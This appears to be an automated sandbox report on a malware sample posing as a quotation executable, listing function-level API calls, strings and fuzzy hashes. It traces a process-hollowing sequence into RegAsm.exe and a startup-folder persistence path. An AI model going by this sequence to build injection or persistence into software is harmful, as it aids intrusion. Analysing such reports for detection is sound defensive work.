Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 20a7b61d14c600f493787d1912d6453a3a3f155d16105cb7e2643415295a57ed
Instruction ID: aace965321b0639d614209eaf372d7e33f9082cd1aabe398c265d3ca0126694b
Opcode Fuzzy Hash: 20a7b61d14c600f493787d1912d6453a3a3f155d16105cb7e2643415295a57ed
Instruction Fuzzy Hash: CB51BEB1D00349EFDB14CF99D884ADEBBB5BF48314F24812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0315BCF9, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315BCC6,?,?,?,?,?), ref: 0315BD87

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5ceca9327ec1240fa917f83b9a7b6775430e3cfc54bad44a8e1ee048e3846b15
Instruction ID: 81f36581103d9d8c8e37403751d863fd6d5220e2073990dbc5df267ea87250bb
Opcode Fuzzy Hash: 5ceca9327ec1240fa917f83b9a7b6775430e3cfc54bad44a8e1ee048e3846b15
Instruction Fuzzy Hash: BC21E5B5900248DFDB10CFA9D884ADEFBF4EB48314F15841AE918B7311D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0315A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0315BCC6,?,?,?,?,?), ref: 0315BD87

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 70d67b39ddd3c29b234d0b39cb852173fdccfa4c6ddfaa675f7cde47a6ec2399
Instruction ID: 6bb94fc4437cb4c1acbd3bc0ff87c6e8029dce0fdd89d557f8d8768611a6f406
Opcode Fuzzy Hash: 70d67b39ddd3c29b234d0b39cb852173fdccfa4c6ddfaa675f7cde47a6ec2399
Instruction Fuzzy Hash: 7C21B3B5904248EFDB10CF9AD984AEEFBF5EB49314F14841AE928B7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03159849, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031596A9,00000800,00000000,00000000), ref: 031598BA

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9e64af8da8b917ee96916442031d7e663e4b9e652daa8f13e596eb201a960060
Instruction ID: c15c466a35d0b38bf224a399cea16b41069a1bfb719599e9412f280f45741fa9
Opcode Fuzzy Hash: 9e64af8da8b917ee96916442031d7e663e4b9e652daa8f13e596eb201a960060
Instruction Fuzzy Hash: 8111D3B6900249DFDB10CF9AD444ADEFBF8AB49314F14842AE929B7600C774A549CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 03158768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031596A9,00000800,00000000,00000000), ref: 031598BA

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a52d91a59b24f60bd8e303faa58e0fe7ee826f886fdcd2594c210119eb80c8b4
Instruction ID: 0bb73faed5d666345aefe929392f5879cacdb22effd1113fd965b8a6c19ee3dc
Opcode Fuzzy Hash: a52d91a59b24f60bd8e303faa58e0fe7ee826f886fdcd2594c210119eb80c8b4
Instruction Fuzzy Hash: 3C1100B6900249DFDB10CF9AD444BDEFBF4EB88324F14842AE929B7600C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0315FE38, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0315FE28,?,?,?,?), ref: 0315FE9D

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b028d5a2b7fdca1c2b83f8a717efeee70373488ae2dbb6511d048500284014db
Instruction ID: f08f019272ec21c7777f69dd60d2d4d65b04b8312bab0c0f578037700ad0d9a8
Opcode Fuzzy Hash: b028d5a2b7fdca1c2b83f8a717efeee70373488ae2dbb6511d048500284014db
Instruction Fuzzy Hash: 2311D2B5900248DFDB10CF99D588BDEFBF8EB49324F11845AE858A7241C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031595C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0315962E

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4295ed35e5bfd7136df3db761819778c9e93264f08b52f7f1fc2278caa3b8485
Instruction ID: 46f59a1b16fef68d380e1e784c67f4706b54148e40d07e4414939e4e5ccc2f80
Opcode Fuzzy Hash: 4295ed35e5bfd7136df3db761819778c9e93264f08b52f7f1fc2278caa3b8485
Instruction Fuzzy Hash: 0811DFB5D00649CFCB10CF9AD444BDEFBF4AB89224F14852AE829B7600D374A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0315DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0315FE28,?,?,?,?), ref: 0315FE9D

Memory Dump Source

Source File: 00000004.00000002.507504955.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 714b8555cc474a3e105a41d3727c5272ecb6930cb81a2b0d6eff684b44fd9823
Instruction ID: 3bf89be6dbfca5d2eed6a6dced95a7e1bffa7057bc896e932cce2c083b716693
Opcode Fuzzy Hash: 714b8555cc474a3e105a41d3727c5272ecb6930cb81a2b0d6eff684b44fd9823
Instruction Fuzzy Hash: 5F11E0B5900248DFDB10CF99D588B9EBBF8EB49324F10841AE929A7301C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Quotation ATB-PR28500KINH.exe PID: 6988 Parent PID: 6620 Quotation ATB-PR28500KINH.exeCOMMON

Executed Functions

Function 057C1D7F, Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 209filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 057C1C2B: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 057C1C6F
Part of subcall function 057C1C2B: NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 057C1CFF
Part of subcall function 057C1C2B: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 057C1D3B

NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 057C1F6A
NtCreateFile.NTDLL(?,00120116,?,?,00000000,00000080,00000000,00000005,00000040,00000000,00000000), ref: 057C2015
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 057C2048

Strings

\??\, xrefs: 057C1E8E, 057C1E94
en, xrefs: 057C1EFC
\??\, xrefs: 057C1E7D, 057C1E80
wcsl, xrefs: 057C1EF5
en, xrefs: 057C1FA4
wcsl, xrefs: 057C1F9D
\??\, xrefs: 057C2059
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe, xrefs: 057C1E14, 057C1E17

Memory Dump Source

Source File: 00000005.00000002.517632897.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false

Similarity

API ID: File$Open$AllocateCreateInformationMemoryProcessQueryVirtualWrite
String ID: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe$\??\$\??\$\??\$en$en$wcsl$wcsl
API String ID: 2302177389-3011451884
Opcode ID: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction ID: a2c2b0311590a79a34a8bdc8cb0e9d2c9eed4d435033635e968efc984d6ddc75
Opcode Fuzzy Hash: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction Fuzzy Hash: 3291D4B2D002599FDB21DFA4DC85BDEBBB8BF09700F10419AE519E7251DB309A84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 057D1C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 057D1CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 057D1CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 057D1CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 057D1D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057D1D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057D1DA9
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 057D1E36
NtGetContextThread.NTDLL(?,?), ref: 057D1E50
NtSetContextThread.NTDLL(?,00010007), ref: 057D1E74
NtResumeThread.NTDLL(?,00000000), ref: 057D1E86

Memory Dump Source

Source File: 00000005.00000002.517650444.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: b15a0565dd823c5d4d90911d0a4303b1808d2faa7d9c445eb7c88740c4d8b9da
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: DD91E371A00248AFDF21DFA5CC88EEEBBB9FF49705F404059FA09EA150D731AA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 057C1C2B, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124nativefilememoryCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 057C1C6F
NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 057C1CFF
NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 057C1D3B
NtReadFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 057C1D64

Strings

wcsl, xrefs: 057C1CA5
en\??\, xrefs: 057C1D73
\??\, xrefs: 057C1C4F, 057C1C52

Memory Dump Source

Source File: 00000005.00000002.517632897.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false

Similarity

API ID: File$AllocateInformationMemoryOpenProcessQueryReadVirtual
String ID: \??\$en\??\$wcsl
API String ID: 3123795954-2781163289
Opcode ID: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction ID: 131f478ab974a521fec178a96a2dcb05dbc078719201f9aabe1767c676e0ca45
Opcode Fuzzy Hash: 9d196668dd853f8673e4fedca3662eaa64dbbfc4a189e147512ad2b14dd7e208
Instruction Fuzzy Hash: D841B3B290025CAFDB20CFD4DC85EEEBBBCEF08310F14415AEA19E6250D7749A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 057C00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 057C0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057C01B8

Strings

NtOpenSection, xrefs: 057C011D, 057C0120
@, xrefs: 057C018C
NtMapViewOfSectionNtOpenSection, xrefs: 057C0128, 057C012B
en, xrefs: 057C0150
wcsl, xrefs: 057C0149

Memory Dump Source

Source File: 00000005.00000002.517632897.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 4c7b83d73880d52204a14d2e2c742f5b03b8e77c36cd0fdca2e67a4359a25cb8
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 163114B1E10258EFCB10DFE4D989ADEBBB8FF08754F20415AE514EB250E7749A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 057D00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 057D0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057D01B8

Strings

NtMapViewOfSectionNtOpenSection, xrefs: 057D0128, 057D012B
@, xrefs: 057D018C
en, xrefs: 057D0150
NtOpenSection, xrefs: 057D011D, 057D0120
wcsl, xrefs: 057D0149

Memory Dump Source

Source File: 00000005.00000002.517650444.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: 2964a98b46a0c78c453cab7d2d7d60b2f6f11c1eaa9c9ab398711d5bc83be1fb
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: D83123B1E10258AFCB10CFE4C889ADEBBB8FF08750F20415AE514EB250E7759A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 057C1C09, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,?), ref: 057C1C21

Memory Dump Source

Source File: 00000005.00000002.517632897.00000000057C0000.00000040.00000001.sdmp, Offset: 057C0000, based on PE: false

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction ID: 54ae84ab8464f00150991caf0ffcecb62ef18a85d1082eaa954023622b1a722c
Opcode Fuzzy Hash: 1c3e7cc53eb4e206c5cba6e74b2dcb3e774dbaf350b88908093e0f35f565dd1b
Instruction Fuzzy Hash: 7CD0C9B595020DBED714DBA0CC47BEEBAACEB45644F008566A502E6190E6B0A6409AB4

Uniqueness

Uniqueness Score: -1.00%

Function 016A92FA, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 016A9368

Memory Dump Source

Source File: 00000005.00000002.507584146.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7831340503b9ea4df31c6d1090cad7c86e35d2648cd61194fc89367e55ab5422
Instruction ID: 0d2aa80efb3ac580b8d0b7be893e373299051036883410516d4664f6124b8956
Opcode Fuzzy Hash: 7831340503b9ea4df31c6d1090cad7c86e35d2648cd61194fc89367e55ab5422
Instruction Fuzzy Hash: 661104719046489FCB10DF9AC884BDFBBF8EF88324F148419E569A7350C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 016A9300, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 016A9368

Memory Dump Source

Source File: 00000005.00000002.507584146.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7d9ca1c18bb71236058b538dacd350c9e2c39c29c4224dd0f50600dc29a180ac
Instruction ID: 8f62c9db8e6d810c5bf1af7957d50196ac441fb6fa49970792bf9ed988f472bf
Opcode Fuzzy Hash: 7d9ca1c18bb71236058b538dacd350c9e2c39c29c4224dd0f50600dc29a180ac
Instruction Fuzzy Hash: C31113B19006489FCB20DF9AC884BDFBBF8EF88324F108419E569A7350C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0150D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507440091.000000000150D000.00000040.00000001.sdmp, Offset: 0150D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4b9f799a4d9d2f66aaf9760487ab0b26f87ea00ed319b462360cf41f86089f
Instruction ID: abc81a10ff2d5c4660c46023b2db09ff5da2bae18cddde99594d2498d805e355
Opcode Fuzzy Hash: 0d4b9f799a4d9d2f66aaf9760487ab0b26f87ea00ed319b462360cf41f86089f
Instruction Fuzzy Hash: 4C21D3B5504244AFDB02DFD4D9C0B2ABBB5FB84214F24C969E9094F286CB36D846CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0150D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507440091.000000000150D000.00000040.00000001.sdmp, Offset: 0150D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a5dd89c4e04e7b034098b9a6b3c5328201ea2187bf87cfbe925b6137f2990e
Instruction ID: 4f955512e101dc31931b6ff2437af74c1fb0712e8244df36c0e4b65b74960908
Opcode Fuzzy Hash: 13a5dd89c4e04e7b034098b9a6b3c5328201ea2187bf87cfbe925b6137f2990e
Instruction Fuzzy Hash: 86118E75504280DFDB02CF94D9C4B19BB71FB84224F24C6A9D8494F696C33AD44ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0131D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.506705547.000000000131D000.00000040.00000001.sdmp, Offset: 0131D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f0e1ff30df087d8747fb4f6f0b93dcc8d7938b5c5aa7e93e59b49b07887834
Instruction ID: c607334f740d0277465453fac5e6a93763c07bb6c04152e90a09198bc9b8a901
Opcode Fuzzy Hash: b1f0e1ff30df087d8747fb4f6f0b93dcc8d7938b5c5aa7e93e59b49b07887834
Instruction Fuzzy Hash: 0E01FC715083849AE7144A55CC8876ABB9CEF4226CF18C119ED095A64FC3749845C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0131D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.506705547.000000000131D000.00000040.00000001.sdmp, Offset: 0131D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3c27c2b50930727a91aa5670282a4dc895d0cb3d6d1b555bf24b3a9ecba5333
Instruction ID: 9349da10043cdd7a61456cc74cd3899bd492480f29acaeeef3302e23fb6ee516
Opcode Fuzzy Hash: d3c27c2b50930727a91aa5670282a4dc895d0cb3d6d1b555bf24b3a9ecba5333
Instruction Fuzzy Hash: A1F0C8714083449BE7148A19CD84B66FF98DB81378F18C05AED080F28BC3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 7088 Parent PID: 904 RegAsm.exeCOMMON

Executed Functions

Function 00A118A8, Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00A11A4B

Memory Dump Source

Source File: 00000008.00000002.279360284.0000000000A10000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: false

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 3ae422e4de2044c22d2a73b9ccb8515dd050c6d2561ce0a7d49bfa125b8f0d82
Instruction ID: 38ecf0c37da9e9f22be96b24147b5875b192d4f4f9fc3a79eaf0f8c5f9f8ba99
Opcode Fuzzy Hash: 3ae422e4de2044c22d2a73b9ccb8515dd050c6d2561ce0a7d49bfa125b8f0d82
Instruction Fuzzy Hash: EB711470E002198FDB24CF99C9947DEBBF1BF48314F25812AE919AB350DB34A985CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 7048 Parent PID: 6988 RegAsm.exeCOMMON

Executed Functions

Function 0544B6C0, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0544B730
GetCurrentThread.KERNEL32 ref: 0544B76D
GetCurrentProcess.KERNEL32 ref: 0544B7AA
GetCurrentThreadId.KERNEL32 ref: 0544B803

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5bdb478f3c08ed893e3d9450f2558e8315eb21604fa4b3f4a033065f51a5e897
Instruction ID: 1e74f11476a37512ba646d40365146a9fbfeb1fb3cc785202c79a3f864c32573
Opcode Fuzzy Hash: 5bdb478f3c08ed893e3d9450f2558e8315eb21604fa4b3f4a033065f51a5e897
Instruction Fuzzy Hash: AF5137B49046498FDB14CFAAC5887EEBBF1FB48304F20845AE419B7350DB749945CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0544B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0544B730
GetCurrentThread.KERNEL32 ref: 0544B76D
GetCurrentProcess.KERNEL32 ref: 0544B7AA
GetCurrentThreadId.KERNEL32 ref: 0544B803

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a3f2add7843f424b50ec0f827713aded27c791d61d653f8ac5e2ef53e8a7e695
Instruction ID: ac372d68250375ccebdf2a18a371df104d25b6dd4067eee65d5a97338bc37635
Opcode Fuzzy Hash: a3f2add7843f424b50ec0f827713aded27c791d61d653f8ac5e2ef53e8a7e695
Instruction Fuzzy Hash: 965136B49046488FDB14CFAAC548BEEBBF1FB48304F20845AE419B7350DB74A945CF66

Uniqueness

Uniqueness Score: -1.00%

Function 054493E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0544962E

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d89e54b401e236b302dd1f9173b317dda1d943aab7157486f6b07aca3a17c9bf
Instruction ID: 1352a9c43c051826984f08fa18e2ad7e4607eca1e43ef52ec0f60f57fe954479
Opcode Fuzzy Hash: d89e54b401e236b302dd1f9173b317dda1d943aab7157486f6b07aca3a17c9bf
Instruction Fuzzy Hash: 54711570A04B058FE764DF2AC455BABB7F1BF88204F00896ED58AD7B40DB75E8059F91

Uniqueness

Uniqueness Score: -1.00%

Function 0544FB20, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0544FD0A

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 21435a460e27a2a0464b89754246618541b0243b33c9c365836a83dec486bf5f
Instruction ID: 242c6e0d1f8b1936787911aa1f70604230f882dd6fbaaea92591d67024e16bea
Opcode Fuzzy Hash: 21435a460e27a2a0464b89754246618541b0243b33c9c365836a83dec486bf5f
Instruction Fuzzy Hash: C66156B1D04388AFDB15CFA9C884ADEBFB1BF49300F19816AE409AB352D7349845CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0544FB98, Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0544FD0A

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9ad9fd9ac183e4ef6212f01928bfd08cadaba86d231d2dad53df58da1077254d
Instruction ID: 9623e8bdfdfe0aeaa3ddb1ca93c420d8db2c204a6b6769552621465f7e758f53
Opcode Fuzzy Hash: 9ad9fd9ac183e4ef6212f01928bfd08cadaba86d231d2dad53df58da1077254d
Instruction Fuzzy Hash: CF5115B1C04249AFDF15CFA9C984ADEBFB1FF49304F15816AE809AB221D7719845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0544FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0544FD0A

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f9c78473dfa019306d3e17a939e8c1f1bbd4faceacff19d436b29ab737357368
Instruction ID: 59cd00bdf4d40ce8c1fce58c9965776af015bfb07548899e3d74a4f391461243
Opcode Fuzzy Hash: f9c78473dfa019306d3e17a939e8c1f1bbd4faceacff19d436b29ab737357368
Instruction Fuzzy Hash: 8941C0B1D10349AFDF14CF99C884ADEBBB5BF88314F24812AE819AB310D774A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0544BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544BD87

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9a38770a439a81c334624fd7942bddad92b81cbd3b3b329930809bd2308bb554
Instruction ID: 0e18644fd721f12a56789f0ea0fada38fb0423bdef645c59345fe538f5eaa073
Opcode Fuzzy Hash: 9a38770a439a81c334624fd7942bddad92b81cbd3b3b329930809bd2308bb554
Instruction Fuzzy Hash: 3721E3B59002489FDF10CFA9D584AEEBBF4FB48324F15845AE959B7310D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0544BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0544BD87

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 46a92e174863d24089959128f78a17823ac5b88be4fba8e2623dd0869024d3ad
Instruction ID: a56747bcc8080b85e67edb4a6f9c3cfd3e873bd17261c6cf38e4238a0f951d9e
Opcode Fuzzy Hash: 46a92e174863d24089959128f78a17823ac5b88be4fba8e2623dd0869024d3ad
Instruction Fuzzy Hash: 6821C2B59002489FDB10CFAAD884ADEBBF4FB48314F14845AE959A7310D378A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05448768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,054496A9,00000800,00000000,00000000), ref: 054498BA

Memory Dump Source

Source File: 00000012.00000002.316670105.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 726fba10fa4e2b98dd99be1a5578928e8b34324d61c568f279fcf9d1ddc15f89
Instruction ID: b3a455b21bdf92b6afc16865ebc4c11239cb7f8be983d908f6c0dfdcef8bea6e
Opcode Fuzzy Hash: 726fba10fa4e2b98dd99be1a5578928e8b34324d61c568f279fcf9d1ddc15f89
Instruction Fuzzy Hash: 4711C2B69042499BDB10CF9AD444ADEBBF4EB88314F14842AE529A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05449849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,054496A9,00000800,00000000,00000000), ref: 054498BA

Memory Dump Source

